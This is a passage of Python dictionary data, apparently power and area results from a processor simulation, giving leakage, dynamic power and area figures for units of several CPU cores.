'Execution Unit/Integer ALUs/Runtime Dynamic': 0.385229,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.19216,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0804801,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0127588,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.121831,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0943595,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.202311,
'Execution Unit/Register Files/Runtime Dynamic': 0.107118,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.316021,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.795281,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 3.40695,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00183089,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00183089,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00160163,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000623801,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00135548,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00661889,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0173072,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0907102,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.76995,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.21938,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.308092,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.27277,
'Instruction Fetch Unit/Runtime Dynamic': 0.642109,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.051916,
'L2/Runtime Dynamic': 0.0109555,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 5.0097,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.81258,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.122052,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.122052,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 5.5884,
'Load Store Unit/Runtime Dynamic': 2.53655,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.300959,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.601918,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.106811,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.10759,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.358754,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0359537,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.701909,
'Memory Management Unit/Runtime Dynamic': 0.143544,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 25.3689,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.280776,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.021376,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.178902,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.481054,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 7.22116,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0713146,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.258703,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.386822,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.474201,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.31606,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.547302,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.361286,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.22465,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.253108,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.355881,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.06018,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.073079,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0114574,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.109482,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0847348,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.182561,
'Execution Unit/Register Files/Runtime Dynamic': 0.0961922,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.28409,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.715316,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 3.12494,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00166271,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00166271,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00145611,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000567998,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00121722,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00599874,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0156599,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0814577,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.18141,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.199935,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.276667,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 7.65524,
'Instruction Fetch Unit/Runtime Dynamic': 0.579718,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0308971,
'L2/Runtime Dynamic': 0.00658136,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.62948,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.63018,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.109751,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.109751,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 5.14986,
'Load Store Unit/Runtime Dynamic': 2.28119,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.270627,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.541254,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0960464,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0965097,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.322161,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0327651,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.646705,
'Memory Management Unit/Runtime Dynamic': 0.129275,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 24.1046,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.254955,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0192295,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.160512,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.434697,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 6.5564,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0762837,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.262605,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.412148,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.485343,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.339814,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.588435,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.388001,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.31625,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.272705,
